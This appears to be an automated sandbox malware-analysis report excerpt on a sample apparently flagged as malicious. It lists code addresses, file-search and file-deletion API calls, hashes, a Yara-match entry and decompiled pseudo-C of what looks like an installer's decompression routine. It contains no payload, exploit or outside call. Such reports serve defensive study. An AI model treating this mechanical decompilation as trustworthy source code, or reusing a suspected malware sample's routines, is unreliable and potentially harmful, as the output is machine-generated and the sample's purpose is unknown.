                                                                                                                          0x00405da5
                                                                                                                          0x00405da7
                                                                                                                          0x00405da8
                                                                                                                          0x00000000
                                                                                                                          0x00405da8
                                                                                                                          0x00405db3
                                                                                                                          0x00405db6
                                                                                                                          0x00405db6
                                                                                                                          0x00405db6
                                                                                                                          0x00405dba
                                                                                                                          0x00405dcd
                                                                                                                          0x00405dd4
                                                                                                                          0x00405dd9
                                                                                                                          0x00405ddd
                                                                                                                          0x00405ded
                                                                                                                          0x00405ddf
                                                                                                                          0x00405de5
                                                                                                                          0x00405de5
                                                                                                                          0x00405df2
                                                                                                                          0x00405df6
                                                                                                                          0x00405e02
                                                                                                                          0x00405e08
                                                                                                                          0x00405e0d
                                                                                                                          0x00405e13
                                                                                                                          0x00405e1e
                                                                                                                          0x00405e24
                                                                                                                          0x00405e26
                                                                                                                          0x00405e29
                                                                                                                          0x00405ed3
                                                                                                                          0x00405ed3
                                                                                                                          0x00405ed7
                                                                                                                          0x00405ed9
                                                                                                                          0x00405ed9
                                                                                                                          0x00405ed9
                                                                                                                          0x00405ed9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e2f
                                                                                                                          0x00405e2f
                                                                                                                          0x00405e2f
                                                                                                                          0x00405e37
                                                                                                                          0x00405e57
                                                                                                                          0x00405e5f
                                                                                                                          0x00405e64
                                                                                                                          0x00405e6b
                                                                                                                          0x00405e86
                                                                                                                          0x00405e8b
                                                                                                                          0x00405e8d
                                                                                                                          0x00405eb1
                                                                                                                          0x00405e8f
                                                                                                                          0x00405e8f
                                                                                                                          0x00405e92
                                                                                                                          0x00405ea6
                                                                                                                          0x00405e94
                                                                                                                          0x00405e97
                                                                                                                          0x00405e9f
                                                                                                                          0x00405e9f
                                                                                                                          0x00405e92
                                                                                                                          0x00405e6d
                                                                                                                          0x00405e73
                                                                                                                          0x00405e75
                                                                                                                          0x00405e7b
                                                                                                                          0x00405e7b
                                                                                                                          0x00405e75
                                                                                                                          0x00000000
                                                                                                                          0x00405e6b
                                                                                                                          0x00405e39
                                                                                                                          0x00405e41
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e43
                                                                                                                          0x00405e4b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e4d
                                                                                                                          0x00405e55
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405eb6
                                                                                                                          0x00405ebe
                                                                                                                          0x00405ec4
                                                                                                                          0x00405ec4
                                                                                                                          0x00405ecd
                                                                                                                          0x00000000
                                                                                                                          0x00405ecd
                                                                                                                          0x00405df8
                                                                                                                          0x00405e00
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405dbc
                                                                                                                          0x00405dbc
                                                                                                                          0x00405dbe
                                                                                                                          0x00405ede
                                                                                                                          0x00405ee0
                                                                                                                          0x00405ee3
                                                                                                                          0x00405f34
                                                                                                                          0x00405f34
                                                                                                                          0x00405f34
                                                                                                                          0x00405ee5
                                                                                                                          0x00405ee8
                                                                                                                          0x00405ef3
                                                                                                                          0x00405ef8
                                                                                                                          0x00405efa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405efd
                                                                                                                          0x00405f09
                                                                                                                          0x00405f0e
                                                                                                                          0x00405f10
                                                                                                                          0x00000000
                                                                                                                          0x00405f2b
                                                                                                                          0x00405f12
                                                                                                                          0x00405f15
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f1a
                                                                                                                          0x00000000
                                                                                                                          0x00405f21
                                                                                                                          0x00405eea
                                                                                                                          0x00405eea
                                                                                                                          0x00000000
                                                                                                                          0x00405eea
                                                                                                                          0x00405dc4
                                                                                                                          0x00405dc7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405dc7

                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,75AA3420,75AA2EE0,00000000), ref: 00405D9D
                                                                                                                          • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75AA3420,75AA2EE0,00000000), ref: 00405E0E
                                                                                                                          • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75AA3420,75AA2EE0,00000000), ref: 00405E1E
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: .$.$PWB$\*.*
                                                                                                                          • API String ID: 2035342205-2468439962
                                                                                                                          • Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                                                                          • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                                                          • Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
                                                                                                                          • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L$s<$}DI<
                                                                                                                          • API String ID: 0-2359212200
                                                                                                                          • Opcode ID: 1c14103e5809b0b8388f877cf59757f49b70710ff34350b9613854c88cc44ccf
                                                                                                                          • Instruction ID: 877b3afbd28c0b175bd14476af5ea05cd53767cffc7759fe3c612bd4a4b208fa
                                                                                                                          • Opcode Fuzzy Hash: 1c14103e5809b0b8388f877cf59757f49b70710ff34350b9613854c88cc44ccf
                                                                                                                          • Instruction Fuzzy Hash: C6E131726047899FDF30DE3889A47DB77A6AFA9350F85402FDC89DB204D7318A868B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406D5F() {
                                                                                                                          				unsigned short _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				void _t533;
                                                                                                                          				void* _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t590;
                                                                                                                          				signed int* _t607;
                                                                                                                          				void* _t614;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t614 - 0x40) != 0) {
                                                                                                                          						 *(_t614 - 0x34) = 1;
                                                                                                                          						 *(_t614 - 0x84) = 7;
                                                                                                                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                          						L132:
                                                                                                                          						 *(_t614 - 0x54) = _t607;
                                                                                                                          						L133:
                                                                                                                          						_t531 =  *_t607;
                                                                                                                          						_t590 = _t531 & 0x0000ffff;
                                                                                                                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                          						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                          							 *(_t614 - 0x40) = 1;
                                                                                                                          							_t532 = _t531 - (_t531 >> 5);
                                                                                                                          							 *_t607 = _t532;
                                                                                                                          						} else {
                                                                                                                          							 *(_t614 - 0x10) = _t565;
                                                                                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                          						}
                                                                                                                          						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                          							L139:
                                                                                                                          							_t533 =  *(_t614 - 0x84);
                                                                                                                          							L140:
                                                                                                                          							 *(_t614 - 0x88) = _t533;
                                                                                                                          							goto L1;
                                                                                                                          						} else {
                                                                                                                          							L137:
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								 *(_t614 - 0x88) = 5;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                          							goto L139;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          						__esi =  *(__ebp - 0x60);
                                                                                                                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          						__ecx =  *(__ebp - 0x3c);
                                                                                                                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          						__ecx =  *(__ebp - 4);
                                                                                                                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          						if( *(__ebp - 0x38) >= 4) {
                                                                                                                          							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          								_t97 = __ebp - 0x38;
                                                                                                                          								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							 *(__ebp - 0x38) = 0;
                                                                                                                          						}
                                                                                                                          						if( *(__ebp - 0x34) == __edx) {
                                                                                                                          							__ebx = 0;
                                                                                                                          							__ebx = 1;
                                                                                                                          							L60:
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__edx = __ebx + __ebx;
                                                                                                                          							__ecx =  *(__ebp - 0x10);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_t216 = __edx + 1; // 0x1
                                                                                                                          								__ebx = _t216;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								L59:
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									goto L54;
                                                                                                                          								}
                                                                                                                          								goto L60;
                                                                                                                          							} else {
                                                                                                                          								L57:
                                                                                                                          								if( *(__ebp - 0x6c) == 0) {
                                                                                                                          									 *(__ebp - 0x88) = 0xf;
                                                                                                                          									goto L170;
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0x70);
                                                                                                                          								__eax =  *(__ebp - 0xc);
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								_t202 = __ebp - 0x70;
                                                                                                                          								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							__eax =  *(__ebp - 0x14);
                                                                                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 8);
                                                                                                                          							__ebx = 0;
                                                                                                                          							__ebx = 1;
                                                                                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							L40:
                                                                                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          							 *(__ebp - 0x48) = __eax;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__eax = __eax << 8;
                                                                                                                          							__eax = __eax + __ebx;
                                                                                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edx = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								 *(__ebp - 0x40) = 1;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__ebx = __ebx + __ebx + 1;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edx;
                                                                                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								L38:
                                                                                                                          								__eax =  *(__ebp - 0x40);
                                                                                                                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          									while(1) {
                                                                                                                          										if(__ebx >= 0x100) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										__eax =  *(__ebp - 0x58);
                                                                                                                          										__edx = __ebx + __ebx;
                                                                                                                          										__ecx =  *(__ebp - 0x10);
                                                                                                                          										__esi = __edx + __eax;
                                                                                                                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          										__ax =  *__esi;
                                                                                                                          										 *(__ebp - 0x54) = __esi;
                                                                                                                          										__edi = __ax & 0x0000ffff;
                                                                                                                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											__cx = __ax;
                                                                                                                          											_t169 = __edx + 1; // 0x1
                                                                                                                          											__ebx = _t169;
                                                                                                                          											__cx = __ax >> 5;
                                                                                                                          											 *__esi = __ax;
                                                                                                                          										} else {
                                                                                                                          											 *(__ebp - 0x10) = __ecx;
                                                                                                                          											0x800 = 0x800 - __edi;
                                                                                                                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          											__ebx = __ebx + __ebx;
                                                                                                                          											 *__esi = __cx;
                                                                                                                          										}
                                                                                                                          										 *(__ebp - 0x44) = __ebx;
                                                                                                                          										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                          											L45:
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t155 = __ebp - 0x70;
                                                                                                                          											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									L53:
                                                                                                                          									_t172 = __ebp - 0x34;
                                                                                                                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          									L54:
                                                                                                                          									__al =  *(__ebp - 0x44);
                                                                                                                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          									L55:
                                                                                                                          									if( *(__ebp - 0x64) == 0) {
                                                                                                                          										 *(__ebp - 0x88) = 0x1a;
                                                                                                                          										goto L170;
                                                                                                                          									}
                                                                                                                          									__ecx =  *(__ebp - 0x68);
                                                                                                                          									__al =  *(__ebp - 0x5c);
                                                                                                                          									__edx =  *(__ebp - 8);
                                                                                                                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          									 *( *(__ebp - 0x68)) = __al;
                                                                                                                          									__ecx =  *(__ebp - 0x14);
                                                                                                                          									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          									__eax = __ecx + 1;
                                                                                                                          									__edx = 0;
                                                                                                                          									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                          									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          									__edx = _t191;
                                                                                                                          									L79:
                                                                                                                          									 *(__ebp - 0x14) = __edx;
                                                                                                                          									L80:
                                                                                                                          									 *(__ebp - 0x88) = 2;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									goto L53;
                                                                                                                          								}
                                                                                                                          								goto L40;
                                                                                                                          							} else {
                                                                                                                          								L36:
                                                                                                                          								if( *(__ebp - 0x6c) == 0) {
                                                                                                                          									 *(__ebp - 0x88) = 0xd;
                                                                                                                          									L170:
                                                                                                                          									_t568 = 0x22;
                                                                                                                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                          									_t535 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t535;
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0x70);
                                                                                                                          								__eax =  *(__ebp - 0xc);
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								_t121 = __ebp - 0x70;
                                                                                                                          								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								goto L38;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L1:
                                                                                                                          					_t534 =  *(_t614 - 0x88);
                                                                                                                          					if(_t534 > 0x1c) {
                                                                                                                          						L171:
                                                                                                                          						_t535 = _t534 | 0xffffffff;
                                                                                                                          						goto L172;
                                                                                                                          					}
                                                                                                                          					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                          						case 0:
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							_t534 =  *( *(_t614 - 0x70));
                                                                                                                          							if(_t534 > 0xe1) {
                                                                                                                          								goto L171;
                                                                                                                          							}
                                                                                                                          							_t538 = _t534 & 0x000000ff;
                                                                                                                          							_push(0x2d);
                                                                                                                          							asm("cdq");
                                                                                                                          							_pop(_t570);
                                                                                                                          							_push(9);
                                                                                                                          							_pop(_t571);
                                                                                                                          							_t610 = _t538 / _t570;
                                                                                                                          							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                          							asm("cdq");
                                                                                                                          							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                          							 *(_t614 - 0x3c) = _t605;
                                                                                                                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                          								L10:
                                                                                                                          								if(_t613 == 0) {
                                                                                                                          									L12:
                                                                                                                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									goto L11;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L11:
                                                                                                                          									_t613 = _t613 - 1;
                                                                                                                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                          								} while (_t613 != 0);
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          							if( *(_t614 - 4) != 0) {
                                                                                                                          								GlobalFree( *(_t614 - 4));
                                                                                                                          							}
                                                                                                                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          							 *(_t614 - 4) = _t534;
                                                                                                                          							if(_t534 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                          								goto L10;
                                                                                                                          							}
                                                                                                                          						case 1:
                                                                                                                          							L13:
                                                                                                                          							__eflags =  *(_t614 - 0x6c);
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								 *(_t614 - 0x88) = 1;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							_t45 = _t614 - 0x48;
                                                                                                                          							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                          							__eflags =  *_t45;
                                                                                                                          							L15:
                                                                                                                          							if( *(_t614 - 0x48) < 4) {
                                                                                                                          								goto L13;
                                                                                                                          							}
                                                                                                                          							_t546 =  *(_t614 - 0x40);
                                                                                                                          							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                          								L20:
                                                                                                                          								 *(_t614 - 0x48) = 5;
                                                                                                                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x74) = _t546;
                                                                                                                          							if( *(_t614 - 8) != 0) {
                                                                                                                          								GlobalFree( *(_t614 - 8));
                                                                                                                          							}
                                                                                                                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                          							 *(_t614 - 8) = _t534;
                                                                                                                          							if(_t534 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          						case 2:
                                                                                                                          							L24:
                                                                                                                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                          							 *(_t614 - 0x84) = 6;
                                                                                                                          							 *(_t614 - 0x4c) = _t553;
                                                                                                                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 3:
                                                                                                                          							L21:
                                                                                                                          							__eflags =  *(_t614 - 0x6c);
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								 *(_t614 - 0x88) = 3;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							_t67 = _t614 - 0x70;
                                                                                                                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							__eflags =  *_t67;
                                                                                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                          							L23:
                                                                                                                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                          							if( *(_t614 - 0x48) != 0) {
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          							goto L24;
                                                                                                                          						case 4:
                                                                                                                          							goto L133;
                                                                                                                          						case 5:
                                                                                                                          							goto L137;
                                                                                                                          						case 6:
                                                                                                                          							goto L0;
